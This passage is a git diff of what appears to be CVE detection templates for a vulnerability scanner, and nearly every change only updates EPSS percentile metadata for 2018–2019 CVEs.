b/http/cves/2018/CVE-2018-2791.yaml @@ -18,7 +18,7 @@ info: cvss-score: 8.2 cve-id: CVE-2018-2791 epss-score: 0.02746 - epss-percentile: 0.89422 + epss-percentile: 0.89429 cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-3167.yaml b/http/cves/2018/CVE-2018-3167.yaml index db1c90c8bf..1f90b2f677 100644 --- a/http/cves/2018/CVE-2018-3167.yaml +++ b/http/cves/2018/CVE-2018-3167.yaml @@ -18,7 +18,7 @@ info: cvss-score: 5.3 cve-id: CVE-2018-3167 epss-score: 0.01975 - epss-percentile: 0.87486 + epss-percentile: 0.87493 cpe: cpe:2.3:a:oracle:application_management_pack:12.1.3:*:*:*:*:e-business_suite:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml index 048207f9ad..5836895078 100644 --- a/http/cves/2018/CVE-2018-3238.yaml +++ b/http/cves/2018/CVE-2018-3238.yaml @@ -17,7 +17,7 @@ info: cvss-score: 6.9 cve-id: CVE-2018-3238 epss-score: 0.00471 - epss-percentile: 0.72913 + epss-percentile: 0.72942 cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2018/CVE-2018-3714.yaml b/http/cves/2018/CVE-2018-3714.yaml index d03b21fdc5..2586f37767 100644 --- a/http/cves/2018/CVE-2018-3714.yaml +++ b/http/cves/2018/CVE-2018-3714.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-3714 cwe-id: CWE-22 epss-score: 0.00364 - epss-percentile: 0.69317 + epss-percentile: 0.69343 cpe: cpe:2.3:a:node-srv_project:node-srv:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-3760.yaml b/http/cves/2018/CVE-2018-3760.yaml index 0ed36d2ade..ba81a56038 100644 --- a/http/cves/2018/CVE-2018-3760.yaml +++ b/http/cves/2018/CVE-2018-3760.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-3760 cwe-id: CWE-200,CWE-22 epss-score: 0.05013 - epss-percentile: 0.91973 + epss-percentile: 0.91985 cpe: cpe:2.3:a:redhat:cloudforms:4.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-3810.yaml b/http/cves/2018/CVE-2018-3810.yaml index ac778389de..a7200fa704 100644 --- a/http/cves/2018/CVE-2018-3810.yaml +++ b/http/cves/2018/CVE-2018-3810.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-3810 cwe-id: CWE-287 epss-score: 0.80538 - epss-percentile: 0.97967 + epss-percentile: 0.97969 cpe: cpe:2.3:a:oturia:smart_google_code_inserter:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml index 9d0af7bee2..7a4ff23693 100644 --- a/http/cves/2018/CVE-2018-5230.yaml +++ b/http/cves/2018/CVE-2018-5230.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-5230 cwe-id: CWE-79 epss-score: 0.00211 - epss-percentile: 0.58861 + epss-percentile: 0.58892 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-5233.yaml b/http/cves/2018/CVE-2018-5233.yaml index 68c9535de2..2ce757029b 100644 --- a/http/cves/2018/CVE-2018-5233.yaml +++ b/http/cves/2018/CVE-2018-5233.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-5233 cwe-id: CWE-79 epss-score: 0.00295 - epss-percentile: 0.65887 + epss-percentile: 0.65922 cpe: cpe:2.3:a:getgrav:grav_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-5316.yaml b/http/cves/2018/CVE-2018-5316.yaml index c185fbbd3a..c32207f741 100644 --- a/http/cves/2018/CVE-2018-5316.yaml +++ b/http/cves/2018/CVE-2018-5316.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-5316 cwe-id: CWE-79 epss-score: 0.00175 - epss-percentile: 0.54532 + epss-percentile: 0.54552 cpe: cpe:2.3:a:patsatech:sagepay_server_gateway_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml index b8e508f7d1..833352d602 100644 --- a/http/cves/2018/CVE-2018-5715.yaml +++ b/http/cves/2018/CVE-2018-5715.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-5715 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.47363 + epss-percentile: 0.47373 cpe: cpe:2.3:a:sugarcrm:sugarcrm:3.5.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-6008.yaml b/http/cves/2018/CVE-2018-6008.yaml index b4d24b56cc..7076dd5b14 100644 --- a/http/cves/2018/CVE-2018-6008.yaml +++ b/http/cves/2018/CVE-2018-6008.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-6008 cwe-id: CWE-200 epss-score: 0.41482 - epss-percentile: 0.96894 + epss-percentile: 0.96896 cpe: cpe:2.3:a:joomlatag:jtag_members_directory:5.3.7:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index a6a6e90c9e..53e4d91f95 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-6184 cwe-id: CWE-22 epss-score: 0.00396 - epss-percentile: 0.70585 + epss-percentile: 0.70608 cpe: cpe:2.3:a:zeit:next.js:4.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml index 8b2eaf2932..1964d8ddbf 100644 --- a/http/cves/2018/CVE-2018-6200.yaml +++ b/http/cves/2018/CVE-2018-6200.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-6200 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45631 + epss-percentile: 0.45643 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml index 4a715b0cf3..ed54647fa7 100644 --- a/http/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-6530 cwe-id: CWE-78 epss-score: 0.94099 - epss-percentile: 0.98901 + epss-percentile: 0.98902 cpe: cpe:2.3:o:d-link:dir-860l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-6910.yaml b/http/cves/2018/CVE-2018-6910.yaml index 12b1817432..69236b5166 100644 --- a/http/cves/2018/CVE-2018-6910.yaml +++ b/http/cves/2018/CVE-2018-6910.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-6910 cwe-id: CWE-668 epss-score: 0.03367 - epss-percentile: 0.90324 + epss-percentile: 0.9033 cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7251.yaml b/http/cves/2018/CVE-2018-7251.yaml index 0f548fa2bf..f822322103 100644 --- a/http/cves/2018/CVE-2018-7251.yaml +++ b/http/cves/2018/CVE-2018-7251.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-7251 cwe-id: CWE-200 epss-score: 0.06473 - epss-percentile: 0.92933 + epss-percentile: 0.92937 cpe: cpe:2.3:a:anchorcms:anchor:0.12.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml index 1b5c545e1d..605260abb1 100644 --- a/http/cves/2018/CVE-2018-7282.yaml +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-7282 cwe-id: CWE-89 epss-score: 0.21784 - epss-percentile: 0.95908 + epss-percentile: 0.9591 cpe: cpe:2.3:a:titool:printmonitor:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2018/CVE-2018-7422.yaml b/http/cves/2018/CVE-2018-7422.yaml index a9f04faee7..5fdf4400c2 100644 --- a/http/cves/2018/CVE-2018-7422.yaml +++ b/http/cves/2018/CVE-2018-7422.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-7422 cwe-id: CWE-22 epss-score: 0.95295 - epss-percentile: 0.99123 + epss-percentile: 0.99124 cpe: cpe:2.3:a:siteeditor:site_editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-7467.yaml b/http/cves/2018/CVE-2018-7467.yaml index 9cb5da94a0..19c1db266a 100644 --- a/http/cves/2018/CVE-2018-7467.yaml +++ b/http/cves/2018/CVE-2018-7467.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-7467 cwe-id: CWE-22 epss-score: 0.00396 - epss-percentile: 0.70585 + epss-percentile: 0.70608 cpe: cpe:2.3:a:axxonsoft:next:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml index 0432cdf980..ac5487a631 100644 --- a/http/cves/2018/CVE-2018-7602.yaml +++ b/http/cves/2018/CVE-2018-7602.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-7602 epss-score: 0.97488 - epss-percentile: 0.99967 + epss-percentile: 0.99966 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml index 7fbf0a3573..38fd97ee9d 100644 --- a/http/cves/2018/CVE-2018-7653.yaml +++ b/http/cves/2018/CVE-2018-7653.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-7653 cwe-id: CWE-79 epss-score: 0.00797 - epss-percentile: 0.79704 + epss-percentile: 0.79714 cpe: cpe:2.3:a:yzmcms:yzmcms:3.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7662.yaml b/http/cves/2018/CVE-2018-7662.yaml index b9df714ff9..e785b751e3 100644 --- a/http/cves/2018/CVE-2018-7662.yaml +++ b/http/cves/2018/CVE-2018-7662.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-7662 cwe-id: CWE-200 epss-score: 0.00286 - epss-percentile: 0.65249 + epss-percentile: 0.65286 cpe: cpe:2.3:a:couchcms:couch:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index 4bcc9f0e77..9362cc5fd2 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-7700 cwe-id: CWE-352 epss-score: 0.73235 - epss-percentile: 0.97756 + epss-percentile: 0.97757 cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7719.yaml b/http/cves/2018/CVE-2018-7719.yaml index f415cdf0ad..707549d995 100644 --- a/http/cves/2018/CVE-2018-7719.yaml +++ b/http/cves/2018/CVE-2018-7719.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-7719 cwe-id: CWE-22 epss-score: 0.09221 - epss-percentile: 0.94013 + epss-percentile: 0.94017 cpe: cpe:2.3:a:acrolinx:acrolinx_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml index c2b513c8b2..570e45a912 100644 --- a/http/cves/2018/CVE-2018-8033.yaml +++ b/http/cves/2018/CVE-2018-8033.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-8033 cwe-id: CWE-200 epss-score: 0.56008 - epss-percentile: 0.97292 + epss-percentile: 0.97294 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8715.yaml b/http/cves/2018/CVE-2018-8715.yaml index d89f21aef4..d0458ec369 100644 --- a/http/cves/2018/CVE-2018-8715.yaml +++ b/http/cves/2018/CVE-2018-8715.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-8715 cwe-id: CWE-287 epss-score: 0.05837 - epss-percentile: 0.92561 + epss-percentile: 0.92566 cpe: cpe:2.3:a:embedthis:appweb:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml index fd1d7b0c54..5863d6d49e 100644 --- a/http/cves/2018/CVE-2018-8719.yaml +++ b/http/cves/2018/CVE-2018-8719.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-8719 cwe-id: CWE-532 epss-score: 0.03177 - epss-percentile: 0.9006 + epss-percentile: 0.90064 cpe: cpe:2.3:a:wpsecurityauditlog:wp_security_audit_log:3.1.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8727.yaml b/http/cves/2018/CVE-2018-8727.yaml index b4dfe1c321..9f2af199ae 100644 --- a/http/cves/2018/CVE-2018-8727.yaml +++ b/http/cves/2018/CVE-2018-8727.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-8727 cwe-id: CWE-22 epss-score: 0.01105 - epss-percentile: 0.82883 + epss-percentile: 0.82894 cpe: cpe:2.3:a:mirasys:dvms_workstation:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8770.yaml b/http/cves/2018/CVE-2018-8770.yaml index a3f0f2a886..12ac801362 100644 --- a/http/cves/2018/CVE-2018-8770.yaml +++ b/http/cves/2018/CVE-2018-8770.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-8770 cwe-id: CWE-200 epss-score: 0.00197 - epss-percentile: 0.57331 + epss-percentile: 0.57359 cpe: cpe:2.3:a:cobub:razor:0.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-9118.yaml b/http/cves/2018/CVE-2018-9118.yaml index 16015bd8c2..9e4a9546dc 100644 --- a/http/cves/2018/CVE-2018-9118.yaml +++ b/http/cves/2018/CVE-2018-9118.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-9118 cwe-id: CWE-22 epss-score: 0.08219 - epss-percentile: 0.93646 + epss-percentile: 0.93652 cpe: cpe:2.3:a:99robots:wp_background_takeover_advertisements:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-9161.yaml b/http/cves/2018/CVE-2018-9161.yaml index 9e123e65b8..1a098deccd 100644 --- a/http/cves/2018/CVE-2018-9161.yaml +++ b/http/cves/2018/CVE-2018-9161.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-9161 cwe-id: CWE-798 epss-score: 0.26342 - epss-percentile: 0.96206 + epss-percentile: 0.96209 cpe: cpe:2.3:a:prismaindustriale:checkweigher_prismaweb:1.21:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-9205.yaml b/http/cves/2018/CVE-2018-9205.yaml index 453efdbb01..1fabcd63aa 100644 --- a/http/cves/2018/CVE-2018-9205.yaml +++ b/http/cves/2018/CVE-2018-9205.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-9205 cwe-id: CWE-22 epss-score: 0.0276 - epss-percentile: 0.89447 + epss-percentile: 0.89453 cpe: cpe:2.3:a:drupal:avatar_uploader:7.x-1.0:beta8:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-9845.yaml b/http/cves/2018/CVE-2018-9845.yaml index 70c1aae974..49d94f48f5 100644 --- a/http/cves/2018/CVE-2018-9845.yaml +++ b/http/cves/2018/CVE-2018-9845.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-9845 cwe-id: CWE-178 epss-score: 0.01393 - epss-percentile: 0.84952 + epss-percentile: 0.84958 cpe: cpe:2.3:a:etherpad:etherpad_lite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-9995.yaml b/http/cves/2018/CVE-2018-9995.yaml index c11a51d1b1..d91c1d7239 100644 --- a/http/cves/2018/CVE-2018-9995.yaml +++ b/http/cves/2018/CVE-2018-9995.yaml @@ -21,7 +21,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-9995 epss-score: 0.93593 - epss-percentile: 0.98833 + epss-percentile: 0.98834 cpe: cpe:2.3:o:tbkvision:tbk-dvr4216_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml index e54effc000..aa9a4173de 100644 --- a/http/cves/2019/CVE-2019-0193.yaml +++ b/http/cves/2019/CVE-2019-0193.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-0193 cwe-id: CWE-94 epss-score: 0.94457 - epss-percentile: 0.9898 + epss-percentile: 0.98981 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index 2c90e3f87f..d9754badd1 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-0221 cwe-id: CWE-79 epss-score: 0.01651 - epss-percentile: 0.8619 + epss-percentile: 0.86196 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-10068.yaml b/http/cves/2019/CVE-2019-10068.yaml index c56290e8db..a06d5d9678 100644 --- a/http/cves/2019/CVE-2019-10068.yaml +++ b/http/cves/2019/CVE-2019-10068.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-10068 cwe-id: CWE-502 epss-score: 0.97404 - epss-percentile: 0.99899 + epss-percentile: 0.999 cpe: cpe:2.3:a:kentico:kentico:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index 4cbb851233..bec090ce7e 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-10092 cwe-id: CWE-79 epss-score: 0.01582 - epss-percentile: 0.859 + epss-percentile: 0.85905 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml index 9ed64e13c5..bc5b9430d6 100644 --- a/http/cves/2019/CVE-2019-10098.yaml +++ b/http/cves/2019/CVE-2019-10098.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-10098 cwe-id: CWE-601 epss-score: 0.10593 - epss-percentile: 0.94408 + epss-percentile: 0.9441 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1010287.yaml b/http/cves/2019/CVE-2019-1010287.yaml index bb3bb9f453..c5b1701e6e 100644 --- a/http/cves/2019/CVE-2019-1010287.yaml +++ b/http/cves/2019/CVE-2019-1010287.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-1010287 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.47395 + epss-percentile: 0.47406 cpe: cpe:2.3:a:timesheet_next_gen_project:timesheet_next_gen:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml index 1bcb273d64..9f93d7933f 100644 --- a/http/cves/2019/CVE-2019-1010290.yaml +++ b/http/cves/2019/CVE-2019-1010290.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-1010290 cwe-id: CWE-601 epss-score: 0.00198 - epss-percentile: 0.57437 + epss-percentile: 0.57466 cpe: cpe:2.3:a:cmsmadesimple:bable\:multilingual_site:*:*:*:*:*:cms_made_simple:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10232.yaml b/http/cves/2019/CVE-2019-10232.yaml index 0156cde05e..fd7ca7d700 100644 --- a/http/cves/2019/CVE-2019-10232.yaml +++ b/http/cves/2019/CVE-2019-10232.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-10232 cwe-id: CWE-89 epss-score: 0.21939 - epss-percentile: 0.9592 + epss-percentile: 0.95922 cpe: cpe:2.3:a:teclib-edition:gestionnaire_libre_de_parc_informatique:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml index 4ffdaa9789..a403d52c3e 100644 --- a/http/cves/2019/CVE-2019-10405.yaml +++ b/http/cves/2019/CVE-2019-10405.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-10405 cwe-id: CWE-79 epss-score: 0.00572 - epss-percentile: 0.75428 + epss-percentile: 0.75452 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index 5291c08967..d3bad877ec 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-10717 cwe-id: CWE-22 epss-score: 0.0042 - epss-percentile: 0.71349 + epss-percentile: 0.71374 cpe: cpe:2.3:a:dotnetblogengine:blogengine.net:3.3.7.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml index c5199bd83d..a4be116815 100644 --- a/http/cves/2019/CVE-2019-10758.yaml +++ b/http/cves/2019/CVE-2019-10758.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.9 cve-id: CVE-2019-10758 epss-score: 0.97406 - epss-percentile: 0.99901 + epss-percentile: 0.99902 cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-11013.yaml b/http/cves/2019/CVE-2019-11013.yaml index 8da61fc4a0..c25cbecedf 100644 --- a/http/cves/2019/CVE-2019-11013.yaml +++ b/http/cves/2019/CVE-2019-11013.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-11013 cwe-id: CWE-22 epss-score: 0.01775 - epss-percentile: 0.86655 + epss-percentile: 0.86658 cpe: cpe:2.3:a:softvelum:nimble_streamer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index be20bac3d8..a66ba56978 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-11248 cwe-id: CWE-862,CWE-419 epss-score: 0.74826 - epss-percentile: 0.97803 + epss-percentile: 0.97806 cpe: cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -42,4 +42,5 @@ http: - "Profile Descriptions" - "goroutine profile: total" condition: or -# digest: 4a0a0047304502200b794213fd94d426d275a4da9ad57b538a64e983cf7a6d337138bddffaafb04a022100f142e341387dd8332b39535620d6df7006261b1fc18fbea19e3cda921697436a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200b794213fd94d426d275a4da9ad57b538a64e983cf7a6d337138bddffaafb04a022100f142e341387dd8332b39535620d6df7006261b1fc18fbea19e3cda921697436a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index e3ab92651c..37094eda4d 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-11370 cwe-id: CWE-79 epss-score: 0.1896 - epss-percentile: 0.95676 + epss-percentile: 0.95679 cpe: cpe:2.3:o:carel:pcoweb_card_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index 2948fb5a60..1dc69e7e54 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -17,7 +17,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-11580 epss-score: 0.97475 - epss-percentile: 0.99962 + epss-percentile: 0.99961 cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml index b25ce582ce..d36eb71701 100644 --- a/http/cves/2019/CVE-2019-11581.yaml +++ b/http/cves/2019/CVE-2019-11581.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-11581 cwe-id: CWE-74 epss-score: 0.97363 - epss-percentile: 0.99868 + epss-percentile: 0.99869 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml index 37e91e4278..ef6abd3e21 100644 --- a/http/cves/2019/CVE-2019-11869.yaml +++ b/http/cves/2019/CVE-2019-11869.yaml @@ -25,7 +25,7 @@ info: cve-id: CVE-2019-11869 cwe-id: CWE-79 epss-score: 0.00321 - epss-percentile: 0.67358 + epss-percentile: 0.67387 cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-12314.yaml b/http/cves/2019/CVE-2019-12314.yaml index 4cb41eeeee..f0f20a7054 100644 --- a/http/cves/2019/CVE-2019-12314.yaml +++ b/http/cves/2019/CVE-2019-12314.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-12314 cwe-id: CWE-22 epss-score: 0.22165 - epss-percentile: 0.95934 + epss-percentile: 0.95937 cpe: cpe:2.3:a:deltek:maconomy:2.2.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12461.yaml b/http/cves/2019/CVE-2019-12461.yaml index 6c80476189..a39fe851de 100644 --- a/http/cves/2019/CVE-2019-12461.yaml +++ b/http/cves/2019/CVE-2019-12461.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-12461 cwe-id: CWE-79 epss-score: 0.00269 - epss-percentile: 0.64184 + epss-percentile: 0.64219 cpe: cpe:2.3:a:webport:web_port:1.19.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml index 7a0183be0f..a349399d60 100644 --- a/http/cves/2019/CVE-2019-12581.yaml +++ b/http/cves/2019/CVE-2019-12581.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-12581 cwe-id: CWE-79 epss-score: 0.00642 - epss-percentile: 0.76953 + epss-percentile: 0.76974 cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12583.yaml b/http/cves/2019/CVE-2019-12583.yaml index dec2292754..82414be71a 100644 --- a/http/cves/2019/CVE-2019-12583.yaml +++ b/http/cves/2019/CVE-2019-12583.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-12583 cwe-id: CWE-425 epss-score: 0.00481 - epss-percentile: 0.73213 + epss-percentile: 0.73243 cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml index 9a28613bfe..84c84b4dd5 100644 --- a/http/cves/2019/CVE-2019-12616.yaml +++ b/http/cves/2019/CVE-2019-12616.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-12616 cwe-id: CWE-352 epss-score: 0.0089 - epss-percentile: 0.80825 + epss-percentile: 0.80839 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml index 1447a6eacd..88f0aada87 100644 --- a/http/cves/2019/CVE-2019-12962.yaml +++ b/http/cves/2019/CVE-2019-12962.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-12962 cwe-id: CWE-79 epss-score: 0.20689 - epss-percentile: 0.95822 + epss-percentile: 0.95824 cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-12990.yaml 